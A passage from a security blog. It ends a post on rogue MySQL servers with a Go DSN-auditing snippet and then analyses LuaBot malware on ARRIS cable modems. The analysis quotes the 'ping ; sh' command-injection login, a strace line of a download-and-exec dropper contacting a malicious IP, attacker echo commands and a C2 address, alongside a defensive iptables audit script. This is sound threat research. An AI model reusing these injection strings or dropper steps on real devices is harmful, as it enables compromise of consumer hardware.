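func Audit(d DSN) []Finding {
	var out []Finding
	if d.Params["allowAllFiles"] == "true" {
		out = append(out, Finding{"HIGH", "allowAllFiles=true: any file the process can read can be uploaded on a server's LOCAL INFILE request"})
	}
	host := strings.SplitN(d.Address, ":", 2)[0]
	local := d.Protocol == "unix" || host == "localhost" || host == "127.0.0.1"
	switch d.Params["tls"] {
	case "", "false":
		if !local {
			out = append(out, Finding{"HIGH", "no TLS: server identity is unverified, so traffic can be read and the server impersonated"})
		}
	case "skip-verify":
		out = append(out, Finding{"MEDIUM", "tls=skip-verify: encrypted, but the server certificate is not verified"})
	case "preferred":
		out = append(out, Finding{"MEDIUM", "tls=preferred: TLS only if the server offers it, so an active attacker can downgrade"})
	}
	return out
}

// Constructed sample DSNs (hosts and credentials are placeholders).
const (
	WeakDSN     = "app:secret@tcp(db.internal:3306)/inventory?allowAllFiles=true"
	HardenedDSN = "app:secret@tcp(db.internal:3306)/inventory?tls=true"
	LocalDSN    = "app:secret@unix(/var/run/mysqld/mysqld.sock)/inventory"
)

func main() {
	for _, dsn := range []string{WeakDSN, HardenedDSN, LocalDSN} {
		d, err := ParseDSN(dsn)
		if err != nil {
			panic(err)
		}
		fmt.Printf("%s -> %d finding(s)\n", dsn, len(Audit(d)))
		for _, f := range Audit(d) {
			fmt.Printf("  [%s] %s\n", f.Severity, f.Message)
		}
	}
}
```

The same two questions apply to any connector, not only the Go driver: is LOCAL INFILE limited to an explicit list of files, and does the client verify the server it talks to before sending anything.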
<div>
<br /></div>
<div>
This feature can also be abused in honeypots and vulnerability scanners. It should be quite interesting to pwn security tools while they scan your MySQL host. If your application registers a MySQL URI handler, your system might be exploited via website links.<br />
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">Another interesting way to abuse MySQL clients is via downgrade attacks, switching to older insecure password authentication and verifying how they behave. But this post is already too long for that...</span><br />
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">Thanks for reading! </span><br />
<span style="text-align: center;"><br /></span></div>
<br />
<br />
<b>LuaBot: Malware targeting cable modems</b><br />
2016-09-12<br />
<br />
<span style="font-family: inherit;">During mid-2015 I disclosed some vulnerabilities affecting multiple ARRIS cable modems. I wrote a <a href="https://w00tsec.blogspot.com/2015/11/arris-cable-modem-has-backdoor-in.html">blogpost about ARRIS' nested backdoor</a> and detailed some of my cable modem research during the 2015 edition from <a href="https://www.nullbyte-con.org/">NullByte Security Conference</a>.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">CERT/CC released the Vulnerability Note <a href="https://www.kb.cert.org/vuls/id/419568">VU#419568</a> and it got <a href="http://www.theregister.co.uk/2015/11/20/arris_modem_backdoor/">lots</a> <a href="http://news.softpedia.com/news/backdoor-within-backdoor-puts-over-600-000-arris-cable-modems-in-danger-496485.shtml">of</a> <a href="https://hardware.slashdot.org/story/15/11/21/0428215/600000-arris-cable-modems-have-backdoors-in-backdoors-researcher-claims">media</a> <a href="http://www.tomshardware.com/news/double-backdoor-arris-cable-modems,30620.html">coverage</a>. I did not provide any PoCs at the time because I was pretty sure that those vulnerabilities were easily wormable... And guess what? Someone has been actively exploiting those devices since May 2016.</span><br />
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">The malware targets <a href="https://www-ssl.intel.com/content/www/us/en/cable-modems/puma5-product-brief.html">Puma 5</a> (ARM/Big Endian) cable modems, including the ARRIS TG862 family. The infection happens in multiple stages and the dropper is very similar to many <a href="https://www.protectwise.com/blog/observing-large-scale-router-exploit-attempts/">common worms</a> that <a href="https://quantumfilament.co/2015/08/17/chapter-2-the-binary/">target embedded devices</a> across <a href="https://isc.sans.edu/diary/19999">multiple architectures</a>. The final stage is an ARMEB version of the <a href="https://www.symantec.com/security_response/writeup.jsp?docid=2016-090915-3236-99">LuaBot Malware</a>.</span><br />
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAdZqoVKRoWbH_cjqHenQeJXdXDO7ycjQuvD5gbObLww7rmXwsPDYhzCKGIKSfYACUQof6HsE9k_0o3XbIOMeJleJ9e5PM31btJUqAD-NeaczcdFdcfC6hF3ZcJP78pEjm-N-lZbSuV7vN/s1600/ps.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiAdZqoVKRoWbH_cjqHenQeJXdXDO7ycjQuvD5gbObLww7rmXwsPDYhzCKGIKSfYACUQof6HsE9k_0o3XbIOMeJleJ9e5PM31btJUqAD-NeaczcdFdcfC6hF3ZcJP78pEjm-N-lZbSuV7vN/s400/ps.png" width="400" /></span></a></div>
<div>
<br />
The ARMEL version of the LuaBot Malware was dissected in a <a href="http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html">blog post from Malware Must Die</a>, but this specific ARMEB build was still unknown and undetected at the time. The malware was initially sent to VirusTotal on 2016-05-26 and it still has a 0/0 detection rate.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi85wDThZ9TkzdTGpu8vtOA2sQMUaOUNtkwGGOdGaqFz-5C6CWdEX8KMuy5EVoMosKSg6A1hrtn7_Ue2q6NKHQZgm6zi9NjkHzQHy2uFdBTZFpiHhgcY8m9ldmP3dEy9L-d1w5YJRL63jSr/s1600/vtotal.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi85wDThZ9TkzdTGpu8vtOA2sQMUaOUNtkwGGOdGaqFz-5C6CWdEX8KMuy5EVoMosKSg6A1hrtn7_Ue2q6NKHQZgm6zi9NjkHzQHy2uFdBTZFpiHhgcY8m9ldmP3dEy9L-d1w5YJRL63jSr/s400/vtotal.PNG" width="400" /></a></div>
<br />
<br /></div>
<div>
<div>
<b><span style="font-family: inherit;">Cable Modem Security and ARRIS Backdoors</span></b></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">Before we go any further, if you want to learn about cable modem security, grab the slides from my talk "Hacking Cable Modems: The Later Years". The talk covers many aspects of the technology used to manage cable modems, how the data is protected, how the ISPs upgrade the firmwares and so on.</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<ul>
<li><span style="font-family: inherit;"><a href="https://github.com/bmaia/slides/raw/master/nullbyte_2015-hacking_cable_modems_the_later_years.pdf">https://github.com/bmaia/slides/raw/master/nullbyte_2015-hacking_cable_modems_the_later_years.pdf</a></span></li>
</ul>
</div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">Pay special attention to slide #86:</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaIq4OARW2tVlwtPRpTWCR_3_hrIXxx-o8nYxyjnt9T-gjJV-znnc2Nd6GSkgnBwTKjca-xUpNgq5gr3OaBYogLtyryHRf6M70eWTvchvFEeHJulnEPqCiou6YqVsi2W9dMhQ2KqlUfCV9/s1600/myths.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaIq4OARW2tVlwtPRpTWCR_3_hrIXxx-o8nYxyjnt9T-gjJV-znnc2Nd6GSkgnBwTKjca-xUpNgq5gr3OaBYogLtyryHRf6M70eWTvchvFEeHJulnEPqCiou6YqVsi2W9dMhQ2KqlUfCV9/s320/myths.PNG" width="320" /></span></a></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">I received some reports that malware creators are remotely exploiting those devices in order to dump the modem's configuration and steal private certificates. Some users also reported that those certificates are being sold for bitcoin to modem cloners all around the world. The report from <a href="http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html">Malware Must Die!</a> also points out that the LuaBot is being used for flooding/DDoS attacks.</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<b><span style="font-family: inherit;">Exploit and Initial Infection</span></b></div>
<div>
<b><span style="font-family: inherit;"><br /></span></b></div>
<div>
<span style="font-family: inherit;">The LuaBot malware is part of a bigger botnet targeting embedded devices from multiple architectures. After examining some infected systems, I noticed that most cable modems were compromised through a command injection in the restricted CLI accessible via the ARRIS Password of The Day Backdoor.</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">Telnet honeypots like the one from <a href="http://www.nothink.org/honeypot_telnet.php">nothink.org</a> have been logging these exploit attempts for some time. </span>They log many apparent brute-force attempts with the username "system" and the password "ping ; sh", but these are, in fact, the commands used to escape from the restricted ARRIS telnet shell.</div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtm9_9yfXT1OjyBORsggxAkSQ7H9mHvrlmUt8JBwf7icMNvEXV7KRIuXTETzWRa7SLtg944n2cNNp-Tf5MT81SkIndHF2bOZ2P1zBDJ747Syk3V8jFGdxsnc66YiFQLwsJX9Os6hTISddp/s1600/top-honeypot.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtm9_9yfXT1OjyBORsggxAkSQ7H9mHvrlmUt8JBwf7icMNvEXV7KRIuXTETzWRa7SLtg944n2cNNp-Tf5MT81SkIndHF2bOZ2P1zBDJ747Syk3V8jFGdxsnc66YiFQLwsJX9Os6hTISddp/s320/top-honeypot.PNG" width="294" /></span></a></div>
<div>
<br /></div>
<div>
<span style="font-family: inherit;">The initial dropper is created by echoing shell commands to the terminal to create a standard ARM ELF.</span></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBGGGVAOdXe9DgThOPc2YYzCWyJkmX5sfO8KT2JcSY1LY44Vd2rUmAzFrWWsUZCX4-K5Ab4qmf-QHDsI2ouyI554wQM3wNlxepswwlh7d1muuQHIz5GI4ZmqgLnDxmahgjh5RBMfUZ3WVN/s1600/dropper.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBGGGVAOdXe9DgThOPc2YYzCWyJkmX5sfO8KT2JcSY1LY44Vd2rUmAzFrWWsUZCX4-K5Ab4qmf-QHDsI2ouyI554wQM3wNlxepswwlh7d1muuQHIz5GI4ZmqgLnDxmahgjh5RBMfUZ3WVN/s640/dropper.png" width="640" /></span></a></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">I have cross-compiled and uploaded a few debugging tools to my <a href="https://github.com/bmaia/cross-utils/tree/master/armeb">cross-utils</a> repository, including <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/gdb">gdbserver</a>, <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/strace">strace</a> and <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/tcpdump">tcpdump</a>. I also happen to have a vulnerable ARRIS TG862, so I can perform dynamic analysis in a controlled environment.</span><br />
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">If you run the dropper using strace to monitor the network syscalls, you can see the initial connection attempt:</span>
<span style="font-family: inherit;"><br /></span>
<br />
<div class="code">
./strace -v -s 9999 -e poll,select,connect,recvfrom,sendto -o network.txt ./mw/drop</div>
<div class="code">
connect(6, {sa_family=AF_INET, sin_port=htons(4446), sin_addr=inet_addr("46.148.18.122")}, 16) = -1 ENODEV (No such device)
</div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The dropper is a simple download-and-exec ARMEB shellcode. The malicious IP 46.148.18.122 is known for </span><a href="https://www.abuseipdb.com/check/46.148.18.122" style="font-family: inherit;">bruteforcing SSH servers and trying to exploit Linksys router command injections</a><span style="font-family: inherit;"> in the wild. After downloading the second stage malware, the script echoes the following string:</span><br />
<div class="code">
echo -e 61\\\\\\x30ck3r
</div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">This pattern is particularly interesting because it is quite similar to the one reported by ProtectWise while </span><a href="https://www.protectwise.com/blog/observing-large-scale-router-exploit-attempts/" style="font-family: inherit;">Observing Large-Scale Router Exploit Attempts</a><span style="font-family: inherit;">:</span><br />
<div class="code">
cmd=cd /var/tmp && echo -ne \\x3610cker > 610cker.txt && cat 610cker.txt
</div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The second stage binary ".nttpd" (MD5 c867d00e4ed65a4ae91ee65ee00271c7) performs some internal checks and creates iptables rules </span>allowing remote access from very specific subnets and <span style="font-family: inherit;">blocking external access to ports 8080, 80, 433, 23 and 22:</span></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5JwQtBVsc61lXDfLLjPNgQ3lVuqQKF2Hw7Gp1oc8njaOqoPZ2DwD7L93nqgP7z3QWQu3P9eQslq0u59P_dhdYmdyNqhovdkpyM75A9xTiDjwDYka36dS5uuJ3-bdyCVmw0f6H9IKmpwgh/s1600/iptables.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5JwQtBVsc61lXDfLLjPNgQ3lVuqQKF2Hw7Gp1oc8njaOqoPZ2DwD7L93nqgP7z3QWQu3P9eQslq0u59P_dhdYmdyNqhovdkpyM75A9xTiDjwDYka36dS5uuJ3-bdyCVmw0f6H9IKmpwgh/s640/iptables.png" width="640" /></a></div>
<div>
<span style="font-family: inherit;"><br /></span></div>
<div>
<span style="font-family: inherit;">These rules block external exploit attempts against ARRIS services/backdoors, restricting access to networks controlled by the attacker.</span><br />
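The pattern described here (management ports dropped for everyone except a handful of specific source networks) is something a device owner or ISP can audit for directly from an iptables-save dump. The following is an added example, not code from this post or from the malware: the ruleset is constructed to mirror the described behaviour, and the allowed subnets are RFC 5737 documentation ranges rather than the ones seen in the wild.

```python
"""Audit an iptables ruleset for management ports fenced off to outside networks.

Added example, not code from the post: the ruleset below is constructed to
mirror the behaviour described (ACCEPT from a few specific subnets, DROP for
everyone else on the device's management ports). The subnets are RFC 5737
documentation ranges, not the ones used in the wild.
"""
import ipaddress
import re

MGMT_PORTS = (22, 23, 80, 8080)

# Source networks a home gateway is expected to be managed from.
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Matches the iptables-save form of simple INPUT rules: optional -s, tcp dport, verdict.
RULE_RE = re.compile(
    r"^-A INPUT(?:\s+-s\s+(?P<src>\S+))?\s+-p\s+tcp(?:\s+-m\s+tcp)?"
    r"\s+--dport\s+(?P<port>\d+)\s+-j\s+(?P<verdict>ACCEPT|DROP|REJECT)\s*$")

# Constructed iptables-save output.
SAMPLE_RULES = """\
*filter
:INPUT ACCEPT [0:0]
-A INPUT -s 203.0.113.0/24 -p tcp -m tcp --dport 23 -j ACCEPT
-A INPUT -s 198.51.100.0/24 -p tcp -m tcp --dport 23 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 23 -j DROP
-A INPUT -s 203.0.113.0/24 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j DROP
-A INPUT -s 192.168.0.0/16 -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j DROP
-A INPUT -p tcp -m tcp --dport 8080 -j DROP
COMMIT
"""


def parse_rules(text):
    """Return (src_or_None, port, verdict) for each INPUT rule we understand."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line.strip())
        if m:
            rules.append((m.group("src"), int(m.group("port")), m.group("verdict")))
    return rules


def is_local(cidr):
    """True if the source network lies inside an RFC 1918 or loopback range."""
    net = ipaddress.ip_network(cidr, strict=False)
    return any(net.version == local.version and net.subnet_of(local)
               for local in LOCAL_NETS)


def audit_mgmt_ports(text):
    """Map each management port that is dropped for the world but opened to
    specific non-local networks onto the list of those networks."""
    rules = parse_rules(text)
    findings = {}
    for port in MGMT_PORTS:
        accepts = [s for s, p, v in rules if p == port and v == "ACCEPT" and s]
        dropped = any(p == port and v != "ACCEPT" and s is None for s, p, v in rules)
        external = [s for s in accepts if not is_local(s)]
        if dropped and external:
            findings[port] = external
    return findings


if __name__ == "__main__":
    for port, nets in audit_mgmt_ports(SAMPLE_RULES).items():
        print("port %d reachable only from %s" % (port, ", ".join(nets)))
```

Port 80 in the sample is opened only to 192.168.0.0/16 and is therefore not reported; ports 22 and 23 are reported because their only ACCEPT rules point at networks outside the LAN while the catch-all verdict is DROP. The local ranges are hard-coded here for simplicity; `ipaddress`'s `is_private` would also classify the documentation ranges as private, which is why the check uses an explicit list.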
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">After setting up the rules, two additional binaries were transferred/started by the attacker. The first one, .sox.rslv (</span>889100a188a42369fd93e7010f7c654b) is a simple DNS query tool based on <a href="https://github.com/wongsyrone/shadowsocks-libev-libsodium-for-server/tree/master/libudns">udns 0.4</a>.</div>
<div>
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig64C0EeT_cKSqkLo7_sAa_s6Iz5DUjBxJLNt829JdlL6y0CeqjiLlE-8ZhyKG5YbHXd_Slg0TDAgcpnnjfKpzG1miKXSw6A2wIRn2vBu8VBJQOUrLnGMO04oLu5w_u9f0PKnYE7WHss8m/s1600/udns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig64C0EeT_cKSqkLo7_sAa_s6Iz5DUjBxJLNt829JdlL6y0CeqjiLlE-8ZhyKG5YbHXd_Slg0TDAgcpnnjfKpzG1miKXSw6A2wIRn2vBu8VBJQOUrLnGMO04oLu5w_u9f0PKnYE7WHss8m/s400/udns.png" width="400" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">The other binary, .sox (</span>4b8c0ec8b36c6bf679b3afcc6f54442a), sets the device's DNS servers to 8.8.8.8 and 8.8.4.4 and provides multiple tunneling functionalities including SOCKS/proxy, DNS and IPv6.</div>
<div>
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo1CE2YiKaOym9V2HOHr5bAflz8R13j4jaZTL8cvrS7A096-s48JzI5Q7HUF2iJv8QMn9VXLuMSmgNBkDSvgUeWV8QAxFBbEj9nkFm6NMTSiETfT7h5upX9pRg3pe7Y6UYGUYOxpVOqLhC/s1600/dns2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo1CE2YiKaOym9V2HOHr5bAflz8R13j4jaZTL8cvrS7A096-s48JzI5Q7HUF2iJv8QMn9VXLuMSmgNBkDSvgUeWV8QAxFBbEj9nkFm6NMTSiETfT7h5upX9pRg3pe7Y6UYGUYOxpVOqLhC/s640/dns2.PNG" width="640" /></a></div>
<span style="font-family: inherit;"><br /></span>
<span style="font-family: inherit;">Parts of the code resemble some <a href="http://code.taobao.org/p/sss-libev/src/trunk/shadowsocks-libev-master/">shadowsocks-libev</a> functionality and there's an interesting reference to the <a href="https://www.threatcrowd.org/domain.php?domain=whrq.net">whrq[.]net domain</a>, which seems to be used as a dnscrypt gateway:</span><br />
<span style="font-family: inherit;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEL7AZHGv6tmYxhz_zodYRRkB9-41uOweQTHw2FAyb-2DfSiTz9NCYahEv0iYOeWpZNWG6A19s4RrFh6d8C47ZbR_Q9yiDyLBVq29uumbL2-FgGRLvYhUxFBoeC7D3KI71iCnKO1V4bG7G/s1600/whrq.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEL7AZHGv6tmYxhz_zodYRRkB9-41uOweQTHw2FAyb-2DfSiTz9NCYahEv0iYOeWpZNWG6A19s4RrFh6d8C47ZbR_Q9yiDyLBVq29uumbL2-FgGRLvYhUxFBoeC7D3KI71iCnKO1V4bG7G/s400/whrq.png" width="400" /></a></div>
<br />
<strike>
All these binaries are used as auxiliary tools</strike> for the LuaBot's final stage, arm_puma5 (061b03f8911c41ad18f417223840bce0), which seems to be selectively installed on vulnerable cable modems.<br />
<br />
<span style="font-family: inherit;"><b>UPDATE: </b>According to <a href="https://medium.com/@x0rz/interview-with-the-luabot-malware-author-731b0646fc8f">this interview</a> with the supposed malware author, "<i>reversers usually get it wrong and say there’s some modules for my bot, but those actually are other bots, some routers are infected with several bots at once. My bot never had any binary modules and always is one big elf file and sometimes only small <1kb size dropper</i>"</span><br />
<div>
<br /></div>
</div>
<div>
<br /></div>
<div>
<b><span style="font-family: inherit;">Final Stage: LuaBot</span></b><br />
<b><span style="font-family: inherit;"><br /></span></b>
The malware's final stage is a 716KB ARMEB ELF binary, statically linked, stripped and compiled using the same Puma5 toolchain as the one I made available on my <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/puma5_toolchain">cross-utils</a> repository.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyB-jqYSSacxCbQWgEiN4LCUwpIr5yuttlrIkzMJZ1ViqVrLsBBRtRezxLFEKltrty_y3ZSVU654FuCbYbQFY4_5K_5H69vfVJERXr5CUH1PT5URq-3K3EKLOe28payMXPwy-FpqDYYmVF/s1600/comment.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyB-jqYSSacxCbQWgEiN4LCUwpIr5yuttlrIkzMJZ1ViqVrLsBBRtRezxLFEKltrty_y3ZSVU654FuCbYbQFY4_5K_5H69vfVJERXr5CUH1PT5URq-3K3EKLOe28payMXPwy-FpqDYYmVF/s400/comment.png" width="400" /></a></div>
<br />
If we use strace to perform a dynamic analysis, we can see the greetings from the bot's author and the creation of a mutex (bbot_mutex_202613). Then the bot starts listening on port 11833 (TCP) and tries to contact the command and control server at 80.87.205.92.</div>
<div>
<br />
<script src="https://gist.github.com/bmaia/a3f976bb608d1212d9b955f46fe85014.js"></script>
<br />
To understand how the malware works, let's mix some manual (static) and dynamic analysis. Time to analyse the binary using IDA Pro and...<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrYdcxYByVavYaAWBkXMmipO8xMmzypNol-IB4C6CRJmmceMMAQI3wFXWCEWVmgf_Q9mZzoeCpX5Ghli2MjGudIqXufn5xsGflonhZ7_0a_sUdpG-8I6NgEl44lMosITlEb-QFOc_lUzXZ/s1600/confused-ida.gif" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrYdcxYByVavYaAWBkXMmipO8xMmzypNol-IB4C6CRJmmceMMAQI3wFXWCEWVmgf_Q9mZzoeCpX5Ghli2MjGudIqXufn5xsGflonhZ7_0a_sUdpG-8I6NgEl44lMosITlEb-QFOc_lUzXZ/s400/confused-ida.gif" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Reversing stripped binaries<br />
<br /></td></tr>
</tbody></table>
The binaries are stripped and IDA Pro's F.L.I.R.T. didn't recognize standard function calls for our ARMEB binary. Instead of spending hours manually reviewing the code, we can use <a href="https://github.com/joxeankoret/diaphora">@matalaz</a>'s <a href="https://github.com/joxeankoret/diaphora">diaphora</a> diffing plugin to port all the symbols.<br />
<br />
First, we need to export the symbols from uClibC's Puma5 toolchain. Download the prebuilt toolchain <a href="https://github.com/bmaia/cross-utils/blob/master/armeb/puma5_toolchain/armeb-linux.tar.xz">here</a> and open the library "armeb-linux\ti-puma5\lib\libuClibc-0.9.29.so" using IDA Pro. Choose File/Script File (Alt+F7), load diaphora.py, select a location to Export IDA Database to SQLite, mark "Export only non-IDA generated functions" and hit OK.<br />
<br />
When it finishes, close the current IDA database and open the binary arm_puma5. Rerun the diaphora.py script and now choose a SQLite database to diff against:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0O6rOaWHD4ixNP7evyIZsQjGhk1-WLi_9PmDU1lkOly88jfWJITM9aqzuO6q95cwskhKpX8jqLb9LTeSjhAkeuVvoeL_sBa8b-e1eR4BlieDSNG55xwl3PCOGw2gTj48EhjZ5mWfCcVnV/s1600/diaphora1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0O6rOaWHD4ixNP7evyIZsQjGhk1-WLi_9PmDU1lkOly88jfWJITM9aqzuO6q95cwskhKpX8jqLb9LTeSjhAkeuVvoeL_sBa8b-e1eR4BlieDSNG55xwl3PCOGw2gTj48EhjZ5mWfCcVnV/s400/diaphora1.png" width="400" /></a></div>
<br />
After a while, it will show various tabs with all the unmatched functions in both databases, as well as the "Best", "Partial" and "Unreliable" matches tabs.<br />
<br />
Browse the "Best matches" tab, right click on the list and select "Import *all* functions" and choose not to relaunch the diffing process when it finishes. Now head to the "Partial matches" tab, delete everything with a low ratio (I removed everything below 0.8), right click in the list and select "Import all data for sub_* function":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIKdtU0j02vFQwXg_tF_LxwRJv61tBLTaeZ8gOz1Duad3n4JWn9jQSTajqIsuGsulIjIQY1qMpkr1HaZArexr-vA-29uDOxBY4Oub6WA6YCP9GEN9GSApfaNTW7brE7dHT6xnFLJI9ELx6/s1600/diaphora-partialmatches.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIKdtU0j02vFQwXg_tF_LxwRJv61tBLTaeZ8gOz1Duad3n4JWn9jQSTajqIsuGsulIjIQY1qMpkr1HaZArexr-vA-29uDOxBY4Oub6WA6YCP9GEN9GSApfaNTW7brE7dHT6xnFLJI9ELx6/s400/diaphora-partialmatches.png" width="400" /></a></div>
<br />
The IDA strings window displays lots of information related to the Lua scripting language. For this reason, I also <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/lua">cross-compiled Lua to ARMEB</a>, loaded the "lua" binary into IDA Pro and repeated the diffing process with <a href="https://github.com/joxeankoret/diaphora">diaphora</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIfjBoSnI0Z9uRahq63UIZ_Fl5ohLJypxgEl6cy_0CVGruH6PXboQk3twh68kwhOgQMleVhn0eljJmuZFZ0fJpOblgvHoDUO00JxqLXHl9hCEoGOoUC8CgQYS8gRPyecoyN-Zl0fSWw2D2/s1600/strings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIfjBoSnI0Z9uRahq63UIZ_Fl5ohLJypxgEl6cy_0CVGruH6PXboQk3twh68kwhOgQMleVhn0eljJmuZFZ0fJpOblgvHoDUO00JxqLXHl9hCEoGOoUC8CgQYS8gRPyecoyN-Zl0fSWw2D2/s640/strings.png" width="640" /></a></div>
<br />
We're almost done now. If you google for some of the debug messages present in the code, you can find a deleted Pastebin that was cached by Google.<br />
<span style="text-align: center;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFpFaNRDcdl_QVRmAxGcyov5kfHFNIY5JP7GaMszO2tC9qLs8WGAdOY71_rwunyVMrEYBJz2NlCcNfnqmEArS0yQNgHB7vG_Lb72EFZk37a6doS6DHldvUtEEZidw25aU3chF_yPrwJwCH/s1600/pastebin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="579" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFpFaNRDcdl_QVRmAxGcyov5kfHFNIY5JP7GaMszO2tC9qLs8WGAdOY71_rwunyVMrEYBJz2NlCcNfnqmEArS0yQNgHB7vG_Lb72EFZk37a6doS6DHldvUtEEZidw25aU3chF_yPrwJwCH/s640/pastebin.png" width="640" /></a></div>
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">I downloaded the C code (evsocketlib.c), created some dummy structs for everything that wasn't included there and cross-compiled it to ARMEB too. And now what? Diffing again =)</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
